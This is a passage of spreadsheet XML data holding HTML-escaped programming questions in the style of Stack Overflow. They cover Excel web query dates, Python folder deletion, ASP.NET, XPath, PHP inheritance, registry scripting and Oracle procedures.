    <t xml:space="preserve">&lt;p&gt;Good afternoon,&lt;/p&gt;
&lt;p&gt;I have a web query in &lt;code&gt;Excel 2002&lt;/code&gt; going against a web page that returns a date column.  The dates are returned as &lt;code&gt;DD/MM/YYYY&lt;/code&gt;, as I would like to show them in my spreadsheet.  My machine running Excel has its regional settings set to en-GB, and the only language set under Internet Options is UK English.&lt;/p&gt;
&lt;p&gt;Nevertheless, the web query pulls the dates as &lt;code&gt;MM/DD/YYYY&lt;/code&gt;, which is misinterpreted by Excel.&lt;/p&gt;
&lt;p&gt;How can I get the Web Query to return the dates in my regional settings, &lt;code&gt;MM/DD/YYYY&lt;/code&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I remove/delete a folder that is not empty with Python?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am getting an 'access is denied' error when I attempt to delete a folder that is not empty. I used the following command in my attempt: &lt;code&gt;os.remove("/folder_name")&lt;/code&gt;. &lt;/p&gt;
&lt;p&gt;What is the most effective way of removing/deleting a folder/directory that is not empty?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you set the current directory of a debugged process?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an application that is sensitive to the directory it gets invoked from â€” it loads some files using relative paths.&lt;/p&gt;
&lt;p&gt;When I start the program through a debugger, how can I control what the initial current directory will be?&lt;/p&gt;
&lt;p&gt;I'd prefer to avoid adding special code to the debugged program to make it call &lt;code&gt;chdir&lt;/code&gt;; my instinct is that the debugger should provide some way to specify that externally, since it's inherently an external setting anyway.&lt;/p&gt;
&lt;p&gt;The debugger I'm using is TotalView, but I'm open to answers for other Linux debuggers since it could help me find a comparable setting in TV. I can specify environment variables when I invoke the program, so on a lark, I tried setting &lt;code&gt;PWD&lt;/code&gt;, but no luck.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a better StringCollection editor for use in PropertyGrids?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm making heavy use of PropertySheets in my application framework's configuration editor.  I like them a lot because it's pretty easy to work with them (once you learn how) and make the editing bulletproof.&lt;/p&gt;
&lt;p&gt;One of the things that I'm storing in my configuration are Python scripts.  It's possible to edit a Python script in a StringCollection editor, which is what I've been using, but there's a long distance between "possible" and "useable."  I'd like to have an editor that actually supported resizeable and monospace fonts, preserved blank lines, and - hey, let's go crazy with the wishlist - did syntax coloring.&lt;/p&gt;
&lt;p&gt;I can certainly write this if I really have to, but I'd prefer not to.&lt;/p&gt;
&lt;p&gt;I've poked around on the Google and can't find anything like what I'm describing, so I thought I'd ask here.  Is this a solved problem?  Has anyone out there already taken a crack at building a better editor?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Ensuring only one user login using ASP.Net Membership Provider</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How would you ensure that only one user is logged in per account at a time?&lt;/p&gt;
&lt;p&gt;Assuming cookies are persistent.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>setting a:visited link to same state as a:link and a:hover</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a idea where my a:link have one state (blue, no underline etc) with a a:hover being white. I want my &lt;strong&gt;visited links to have the same state&lt;/strong&gt; as &lt;code&gt;a:link&lt;/code&gt; and &lt;code&gt;a:hover&lt;/code&gt;. Is this possible? supported in most common browsers?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Proper ObjectDataSource Use</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Greetings!&lt;/p&gt;
&lt;p&gt;I'm creating a User Control that will display data in a GridView control.  We are using n-tier architecture and the data in question is retrieved from our database and returned to us as a ReadOnlyCollection.  OurNewObject is a class containing several properties and an empty constructor that takes no parameters - it's in the following namespace: Acme.ObjectModel.&lt;/p&gt;
&lt;p&gt;In the user control, I have the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;asp:GridView ID="ourGrid" runat="server" DataSourceID="ourDataSource"&amp;gt;
    &amp;lt;columns&amp;gt;
    &amp;lt;asp:BoundField DataField="Name" HeaderText="Full Name" /&amp;gt;
    &amp;lt;asp:BoundField DataField="Gender" HeaderText="Gender" /&amp;gt;
    &amp;lt;asp:BoundField DataField="BirthYear" HeaderText="Year of Birth" /&amp;gt;
    &amp;lt;asp:BoundField DataField="JoinDate" HeaderText="Date Joined" /&amp;gt;
  &amp;lt;/columns&amp;gt;
&amp;lt;/asp:GridView&amp;gt;
&amp;lt;asp:ObjectDataSource ID="ourDataSource" runat="server" SelectMethod="GetTopUsers" TypeName="Acme.Model.OurNewObject"&amp;gt;
&amp;lt;/asp:ObjectDataSource&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In the User Control's code behind, I have the following public method:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public ReadOnlyCollection&amp;lt;OurNewObject&amp;gt; GetTopUsers()
{
    return (OurDataProxy.GetJustTheTopUsers());
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I place the User Control on a Web form and run it, I get the following message:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;ObjectDataSource 'ourDataSource' could not find a non-generic method 'GetTopUsers' that has no parameters.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;So my questions are:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Am I using the ObjectDataSource
incorrectly?&lt;/li&gt;
&lt;li&gt;Is there a more proper way to use the ObjectDataSource in this situation?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I prevent XML::XPath from fetching a DTD while processing an XML file?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My XML (&lt;strong&gt;a.xhtml&lt;/strong&gt;) starts like this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&amp;gt;
...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My code starts like this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;use XML::XPath;
use XML::XPath::XMLParser;
my $xp = XML::XPath-&amp;gt;new(filename =&amp;gt; "a.xhtml");
my $nodeset = $xp-&amp;gt;find('/html/body//table'); 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It's very slow, and it turns out that it spends a lot of time getting the DTD (&lt;a href="http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" rel="nofollow"&gt;http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd&lt;/a&gt;).&lt;/p&gt;
&lt;p&gt;Is there a way to explicitly declare an HTTP proxy server in the Perl XML:: family? I hate to modify the original &lt;strong&gt;a.xhtml&lt;/strong&gt; document like having a local copy of the DTD.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Inheriting a .net class</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Ok here's what I'm trying to do I want to write a class that inherits everything from the class ListItem&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class RealListItem : ListItem
{
  public string anExtraStringINeed;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For some reason or another .net is treating all the members like they are private when I try to do this so my class is worthless.&lt;/p&gt;
&lt;p&gt;I tried to do a work around and do it like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class RealListItem : ListItem
{
  public string anExtraStringINeed;
  public ListItem list;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but it still doesn't work because I need to use it in a function that uses the accepts type ListItem and RealListItem isn't playing nice like it should.  I can do aRealListItem.list but that only passes the list from RealListItem I need the whole object to be passed along.&lt;/p&gt;
&lt;p&gt;Whats with this am I doing something wrong or will microsoft just not let you inherit .net classes?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a JavaScript alert that doesn't pause the script?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for something like &lt;code&gt;alert()&lt;/code&gt;, but that doesn't "pause" the script.&lt;/p&gt;
&lt;p&gt;I want to display an alert and allow the next command, a form &lt;code&gt;submit()&lt;/code&gt;, to continue. So the page will be changing after the alert is displayed, but it won't wait till the user has clicked OK.&lt;/p&gt;
&lt;p&gt;Is there something like this or is it just one of those impossible things?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are use-cases for a coroutine?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The concept of a &lt;a href="http://en.wikipedia.org/wiki/Coroutine"&gt;coroutine&lt;/a&gt; sounds very interesting, but I don't know, if it makes sense in a real productive environment? What are use-cases for coroutines, that can be solved more elegant, simpler or more efficient as with other methods?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Variable (dynamic) OPTION lists in HTML SELECT using IE</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to implement a dynamic OPTION list in JavaScript.  Depending on other selections in the web form, some of the OPTIONS in a specific SELECT are not valid.  Things I've tried that don't work in IE are: &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;populate all options, then set the disabled property for those that are invalid&lt;/li&gt;
&lt;li&gt;populate all options and use option groups, then disable invalid option groups &lt;/li&gt;
&lt;li&gt;I even tried using a style of text-decoration:line-through&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;At this point I'm resigned to repopulating the SELECT with only valid OPTIONs, but it seems like there ought to be a better way that actually works in IE.  I require compatibility with IE6 and up.  How have you dealt with this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>what's the best way to parse a body of text against multiple (15+) regexes on each line?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a body of text that I have to scan and each line contains at least 2 and sometimes four parts of information. The problem is that each line can be 1 out of 15-20 different actions.&lt;/p&gt;
&lt;p&gt;in ruby the current code looks somewhat like this:&lt;/p&gt;
&lt;pre&gt;
text.split("\n").each do |line|  #around 20 times..
..............
      expressions['actions'].each do |pat, reg| #around 20 times
.................
&lt;/pre&gt;
&lt;p&gt;this obviously is 'THE PROBLEM'
I did manage to make it faster (in c++ by a 50% margin) by combining all the regexen into one but that is still not the speed I require -- I need to parse thousands of these files FAST!&lt;/p&gt;
&lt;p&gt;Right now I match them with regexes -- however this is intolerably slow. I started with ruby and hopped over to c++ in hopes that I'd get a speed boost and it just isn't happening.&lt;/p&gt;
&lt;p&gt;I've casually read on PEGs and grammar based parsing but it looks somewhat difficult to implement. Is this the direction I should head or are there different routes?&lt;/p&gt;
&lt;p&gt;basically I'm parsing poker hand histories and each line of the hand history usually contains 2-3 bits of information that I need to collect:
who the player was, how much money or what cards the action entailed.. etc..&lt;/p&gt;
&lt;p&gt;sample text that needs to be parsed:&lt;/p&gt;
&lt;pre&gt;
buriedtens posts $5
The button is in seat #4
*** HOLE CARDS ***
Dealt to Mayhem 31337 [8s Ad]
Sherwin7 folds
OneMiKeee folds
syhg99 calls $5
buriedtens raises to $10
&lt;/pre&gt;
&lt;p&gt;after I collect this information each action is turned into an xml node&lt;/p&gt;
&lt;p&gt;right now my ruby implementation of this is much faster than my c++ one but that's prob. just cause I have not written in c code for well over 4-5 years&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE:&lt;/strong&gt;
I don't want to post all the code here but so far my hands/second look like the following:&lt;/p&gt;
&lt;pre&gt;
588 hands/second -- boost::spirit in c++
60 hands/second -- 1 very long and complicated regex in c++ (all the regexen put together)
33 hands/second -- normal regex style in ruby
&lt;/pre&gt;
&lt;p&gt;I'm currently testing antlr to see if we can go any further but as of right now I'm very very happy with spirit's results.&lt;/p&gt;
&lt;p&gt;Related question: &lt;a href="http://stackoverflow.com/questions/192957/efficiently-querying-one-string-against-multiple-regexes"&gt;Efficiently querying one string against multiple regexes.&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In SQL*Plus, how do I change the prompt to show the connected user and database?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;To show, for example....&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;USER@SID &amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I thought this was potentially helpful to a few people so I'm going to answer it too!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I select multiple sets of attributes within an XML document using XPath?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am having trouble constructing a single XPath statement to return two different sets of attributes.  &lt;/p&gt;
&lt;p&gt;For example take the following XML document:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;root&amp;gt;
 &amp;lt;line name="one" alpha="a1" beta="b1"/&amp;gt;
 &amp;lt;line name="two" alpha="a2" beta="b2"/&amp;gt;
 &amp;lt;line name="three" alpha="a3" beta="b3"/&amp;gt;
&amp;lt;/root&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I use the following XPath statement:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//@alpha
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It yields the following attribute set:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;alpha="a1"
alpha="a2"
alpha="a3"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What statement do I use to yield the following attribute set:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;alpha="a1"
alpha="a2"
alpha="a3"
beta="b1"
beta="b2"
beta="b3"
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Mutli-threaded application hanging on _dl_sysinfo_int80</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a multi-threaded application that is hanging on a call to _dl_sysinfo_int80().  According to gdb, all threads are stuck in this call.&lt;/p&gt;
&lt;p&gt;The top of the stack trace looks like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#0  0x002727a2 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
#1  0x004f23de in __lll_mutex_lock_wait () from /lib/tls/libpthread.so.0
#2  0x004ef00b in _L_mutex_lock_35 () from /lib/tls/libpthread.so.0
#3  0x092828ac in construction vtable for std::ostream-in-std::basic_stringstream&amp;lt;char, std::char_traits&amp;lt;char&amp;gt;, std::allocator&amp;lt;char&amp;gt; &amp;gt; ()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any idea what could be causing this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to send optional parameters to an action?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can I send optional parameters (empty strings, null int?'s etc) to an action through a GET request in asp.net mvc? (one sentence question!)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>RegDelete cannot delete Registry key in WSH 5.7</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Based on the advice provided at &lt;a href="http://www.tweakguides.com/VA_4.html" rel="nofollow"&gt;http://www.tweakguides.com/VA_4.html&lt;/a&gt; to prevent Windows Vista from "intelligently" rearranging column formats in Windows Explorer, I have written a script to automate the process a little.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Dim WshShell
Set WshShell = WScript.CreateObject("WScript.Shell")
'Remove the "filthy" reg keys first.
regKey = "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\"
WScript.Echo "Deleting " &amp;amp; regKey &amp;amp; VbCrLf
WshShell.RegDelete regKey
regKey = "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\"
WScript.Echo "Deleting " &amp;amp; regKey &amp;amp; VbCrLf
WshShell.RegDelete regKey
'Then recreate a clean Bags key, with sub-keys and FolderType value.
regKey = "HKCU\Software\Classes\Local Settings\Software\Microsoft\ Windows\Shell\Bags\AllFolders\Shell\FolderType"
WScript.Echo "Creating " &amp;amp; regKey &amp;amp; " as 'NotSpecified' REG_SZ " &amp;amp; VbCrLf
WshShell.RegWrite regKey, "NotSpecified", "REG_SZ"
WScript.Echo "Now define the columns of your preference in Windows Explorer," &amp;amp; VbCrLf
WScript.Echo "and click the Apply to Folders button in Folder Options." &amp;amp; VbCrLf
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But it is refusing to delete the registry key&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;E:\archive\settings\Windows Vista Explorer columns.vbs(9, 1) WshShell.RegDelete:
 Unable to remove registry key "HKCU\Software\Classes\Local Settings\Software\Mi
crosoft\Windows\Shell\BagMRU\".
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The suggestion is to put trailing "\" to indicate a key, which I did. Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Vector or diagram drawing webservice</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a webapp from which I'd like to insert diagrams and images quickly and easily.  I expect there is, somewhere out there, a webservice which will take a URL with a parameter that describes the vector graphics or diagram and returns an image.&lt;/p&gt;
&lt;p&gt;No unlike what google charts does for graphing data.&lt;/p&gt;
&lt;p&gt;Any resources or ideas on this?&lt;/p&gt;
&lt;p&gt;If I had to build it myself, do you have some ideas of how I might accomplish that?&lt;/p&gt;
&lt;p&gt;For instance, does PHP/asp/etc have a graphics library that's capable of rendering simple vector graphics?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to dynamically call child class methods in PHP 5?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;&amp;lt;?php
class foo
{
    //this class is always etended, and has some other methods that do utility work
    //and are never overrided
    public function init()
    {
    	//what do to here to call bar-&amp;gt;doSomething or baz-&amp;gt;doSomething 
    	//depending on what class is actually instantiated? 
    }
    function doSomething()
    {
    	//intentionaly no functionality here
    }
}
class bar extends foo
{
    function doSomething()
    {
        echo "bar";
    }
}
class baz extends foo
{
    function doSomething()
    {
    	echo "baz";
    }
}
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to pass a parameter to a dynamically set Javascript function?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Ok, I have one Javascript that creates rows in a table like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  function AddRow(text,rowID) 
  {
    var tbl = document.getElementById('tblNotePanel');
    var row = tbl.insertRow(tbl.rows.length);
    var cell = row.insertCell();
    var textNode = document.createTextNode(text);
    cell.id = rowID;
    cell.style.backgroundColor = "gold";
    cell.onclick = clickTest;
    cell.appendChild(textNode);
  }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In the above function I set the cell's "onclick" function to call another Javascript function called "clickTest".  My question is, when I assign the "onclick" event to call "clickTest", how do I set parameter information to be sent when the "clickTest" method is called on the cell's "onclick" event?  Or, how do I access the cell's ID in the "clickTest" function?&lt;/p&gt;
&lt;p&gt;Thanks,
Jeff&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does ASP.NET webforms need the Runat="Server" attribute?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Why do I have to specify &lt;code&gt;runat="server"&lt;/code&gt; on all my ASP.NET controls when it is a mandatory attribute and &lt;code&gt;server&lt;/code&gt; is the only option available in my limited knowledge of ASP.NET, and I get an error if I don't use it?&lt;/p&gt;
&lt;p&gt;I do understand that I can optionally use it on my HTML tags, and I do understand the client/server paradigm and what it is actually specifying.&lt;/p&gt;
&lt;p&gt;Is it a redundant tag that could just be implied by the control being an ASP.NET control, or is there an underlying reason?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way of converting a Microsoft Word document into XHTML?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to programatically convert a Microsoft Word document into XHTML. The language of choice is PHP, so I would appreciate any suggestions with PHP.&lt;/p&gt;
&lt;p&gt;The initial idea is trying to convert the doc file into odt, and then use the &lt;a href="http://odt2xhtml.eu.org/index_en.html" rel="nofollow"&gt;Odt2Xhtml&lt;/a&gt; PHP class to get it into XHTML format.&lt;/p&gt;
&lt;p&gt;Any better way to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL DataReader missing a row in loop</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When running the following code it leaves out one row. When I do a files.Count it says there are 4 rows but there is no data stored for the 4th row. When I run the stored procedure from within SQL Manager it returns all 4 rows and all the data. Any help?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;            List&amp;lt;File&amp;gt; files = new List&amp;lt;File&amp;gt;();
            SqlConnection active_connection = new SqlConnection(m_connection_string);
            SqlCommand cmd = new SqlCommand();
            SqlDataReader dr = null;
            try
            {
                active_connection.Open();
                cmd.Connection = active_connection;
                cmd.CommandType = CommandType.StoredProcedure;
                cmd.CommandText = "dalsp_Select_Organization_Files";
                SqlParameter param;
                param = cmd.Parameters.Add("@p_organization_guid", SqlDbType.UniqueIdentifier);
                param.Value = new Guid(organization_guid);
                param = cmd.Parameters.Add("@p_file_type", SqlDbType.NVarChar, 50);
                param.Value = file_type;
                dr = cmd.ExecuteReader(CommandBehavior.CloseConnection);
                if (dr.HasRows)                    
                {                    
                    while (dr.Read())
                    {
                        File file = new File();
                        file.OrganizationGuid = dr["OrganizationGuid"].ToString();
                        file.FileGuid = dr["FileGuid"].ToString();
                        file.FileLocation = dr["FileLocation"].ToString();
                        file.FileName = dr["FileName"].ToString();
                        file.FileType = (FileTypeEnum)Enum.Parse(typeof(FileTypeEnum), dr["FileType"].ToString());
                        file.FileExtension = dr["FileExtension"].ToString();
                        file.FileDescription = dr["FileDescription"].ToString();
                        file.ThumbnailPath = dr["ThumbnailPath"].ToString();
                        files.Add(file);
                    }       
                }
                dr.Close();
                dr = null;
                active_connection.Close();
                cmd = null;
            }
            catch (Exception)
            {
                throw;
            }
            finally
            {
                if (active_connection.State != ConnectionState.Closed)
                {
                    active_connection.Close();
                    active_connection.Dispose();
                }
            }
            return files;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>problem with cross-domain ajax calls</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i have two servers a main site and a static server. 
i want to get a file's content from ajax in runtime, which is stored in static server.
obviously cross domain problem will occur.&lt;/p&gt;
&lt;p&gt;so what i am trying to do is storing that ajax .js in the static server, so that calling the local file wont be a problem.&lt;/p&gt;
&lt;p&gt;but after i include that js file from static, still that problem remains...&lt;/p&gt;
&lt;p&gt;Any solutions?!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Spin Control in Delphi</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to use a "spin button control" (also known as an up-down control) in my Delphi Win 32 application (I'm using Delphi 2007). &lt;/p&gt;
&lt;p&gt;The aim is to have a control that looks like in Microsoft Office:&lt;/p&gt;
&lt;p&gt;&lt;/p&gt;
&lt;p&gt;I found this on the Microsoft website: &lt;a href="http://msdn.microsoft.com/de-de/library/sfac27cz(VS.80).aspx" rel="nofollow"&gt;CSpinButtonCtrl Class&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;But I haven't so far found a control that uses this class - here's where I've been searching:&lt;/p&gt;
&lt;ul&gt;
 &lt;li&gt;The SpinEdit control in Delphi looks well... not so good, and doesn't seem to use the official Microsoft control&lt;/li&gt;
 &lt;li&gt;The JVCL classes have their own implementation&lt;/li&gt;
 &lt;li&gt;A Google search did not return any results (except some home-brew up/down controls)&lt;/li&gt;
  &lt;li&gt;I couldn't find something in the Jedi API as well&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Can somebody please point me to where I can find a Delphi implementation of the common spin control from Microsoft, or how I can do that myself?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Linq to SQL update not working using Repository pattern</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using asp.net mvc for an application.  I've taken some guidance from Rob Conery's series on the MVC storefront.  I am using a very similar data access pattern to the one that he used in the storefront.&lt;/p&gt;
&lt;p&gt;However, I have added a small difference to the pattern.  Each class I have created in my model has a property called IsNew.  The intention on this is to allow me to specify whether I should be inserting or updating in the database.&lt;/p&gt;
&lt;p&gt;Here's some code:&lt;/p&gt;
&lt;p&gt;In my controller:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;OrderService orderService = new OrderService();
Order dbOrder = orderService.GetOrder(ID);
if (ModelState.IsValid)
{
    dbOrder.SomeField1 = "Whatever1";
    dbOrder.SomeField2 = "Whatever2";
    dbOrder.DateModified = DateTime.Now;
    dbOrder.IsNew = false;
    orderService.SaveOrder(dbOrder);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And then in the SQLOrderRepository:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public void SaveOrder(Order order)
{
    ORDER dbOrder = new ORDER();
    dbOrder.O_ID = order.ID;
    dbOrder.O_SomeField1 = order.SomeField1;
    dbOrder.O_SomeField2 = order.SomeField2;
    dbOrder.O_DateCreated = order.DateCreated;
    dbOrder.O_DateModified = order.DateModified;
    if (order.IsNew)
        db.ORDERs.InsertOnSubmit(dbOrder);
    db.SubmitChanges();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I change the controller code so that the dbOrder.IsNew = true; then the code works, and the values are inserted correctly.&lt;/p&gt;
&lt;p&gt;However, if I set the dbOrder.IsNew = false; then nothing happens...there are no errors - it just doesn't update the order.&lt;/p&gt;
&lt;p&gt;I am using DebuggerWriter here: &lt;a href="http://www.u2u.info/Blogs/Kris/Lists/Posts/Post.aspx?ID=11" rel="nofollow"&gt;http://www.u2u.info/Blogs/Kris/Lists/Posts/Post.aspx?ID=11&lt;/a&gt; to trace the SQL that is being generated, and as expected, when the IsNew value is true, the Insert SQL is generated and executed properly.  However, when IsNew is set to false, there appears to be no SQL generated, so nothing is executed.&lt;/p&gt;
&lt;p&gt;I've verified that the issue here (http://stackoverflow.com/questions/206532/linq-not-updating-on-submitchanges) is not the problem.&lt;/p&gt;
&lt;p&gt;Any help is appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Have you ever used a genetic algorithm in real-world applications?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was wondering how common it is to find genetic algorithm approaches in commercial code.&lt;/p&gt;
&lt;p&gt;It always seemed to me that some kinds of schedulers could benefit from a GA engine, as a supplement to the main algorithm.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to make Oracle procedure return result sets</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;SQL Server procedure can return result sets. I have a table &lt;strong&gt;emp(emp__id, emp__name, ...)&lt;/strong&gt;. The procedure below will return a list of employees that matched with the name provided.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE OR REPLACE PROCEDURE get_employee_by_name ( @name VARCHAR(100) )
AS
SELECT emp_id, emp_name
FROM emp
WHERE emp_name = @name;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So in the client code, to get the data I use ADO.NET.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SQLDataAdapter adapter = new SQLDataAdapter("get_employee_by_name", cnString);
SQLDataAdapter.SelectCommand.CommandType = CommandType.StoredProcedure;
DataTable dt = new DataTable("employee");
adapter.Fill(dt);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can I code equivalently in PL/SQL?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I store the generics attribute into an object's field</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Assuming the following class stub:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class Foo&amp;lt;T&amp;gt; {
  private Class&amp;lt;T&amp;gt; type;
  public Foo&amp;lt;T&amp;gt; () {}
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Can I store the generic type &lt;code&gt;T&lt;/code&gt; into the field &lt;code&gt;type&lt;/code&gt; in the constructor, without changing the constructor's signature to "&lt;code&gt;public Foo&amp;lt;T&amp;gt; (Class&amp;lt;T&amp;gt; type)&lt;/code&gt;"? &lt;/p&gt;
&lt;p&gt;If yes, how? If no, why?&lt;/p&gt;
&lt;p&gt;"&lt;code&gt;type = T&lt;/code&gt;" doesn't seem to work.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does the CLR automatically detect if the garbage collector should be run in server mode?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;From a previous question I have seen that the CLR has workstation and server modes for its garbage collector.  I know that these can be set from configuration using the &lt;a href="http://msdn.microsoft.com/en-us/library/ms229357.aspx" rel="nofollow"&gt;&lt;code&gt;gcServer&lt;/code&gt;&lt;/a&gt; element.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;If you don't specify this, does the CLR use some magic to decide for you whether the garbage collector should run in server mode?&lt;/strong&gt;  Something based on CPU count, or memory profiling maybe?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I access the bookmarks toolbar using only shortcuts in Firefox 3</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am not interested in accessing the bookmarks menu or sidebar. The specific goal that I'm trying to accomplish is to be able to easily navigate (using only the keyboard) through the live bookmarks loaded from stack overflow by means of a feed reader and located on my bookmarks toolbar. &lt;/p&gt;
&lt;p&gt;Notes:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;I have found an add-on that supposedly does exactly what I need:  &lt;a href="https://addons.mozilla.org/en-US/firefox/addon/3647" rel="nofollow"&gt;Bookmark Keys&lt;/a&gt;, but unfortunately it doesn't work in firefox 3), and is not being currently maintained.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;I'm using WinXP at work and Ubuntu 8.04 at home.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Edit: changed bookmark keys "not compatible" with firefox 3 to "not working" in firefox 3&lt;/p&gt;
